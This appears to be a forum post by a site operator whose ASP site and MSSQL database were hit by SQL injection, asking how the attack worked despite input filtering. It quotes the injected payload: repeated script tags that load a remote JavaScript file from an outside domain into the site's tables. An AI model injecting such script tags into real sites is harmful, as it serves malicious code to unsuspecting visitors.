We recently had a MSSQL injection on our server and don't know why it happened. We get a funny email in our ticket center that is at another data center that says we have an exploit in our code and then two hours later the server get hacked through our asp code and then we have multiple sql injection of this random string in some tables.

"<script src=http://www.qiq<script src=http://www.dota11.cn/m.js></script>
<script src=http://www.dot<script src=http://www.dota11.cn/m.js></script>
<script src=http://www.qiq<script src=http://www.dota11.cn/m.js></script>"

If the code wont allow special character as a input into database writes, how can a person do a sql injection by phrasing off a compiled dll file that dosnt accept file attachments.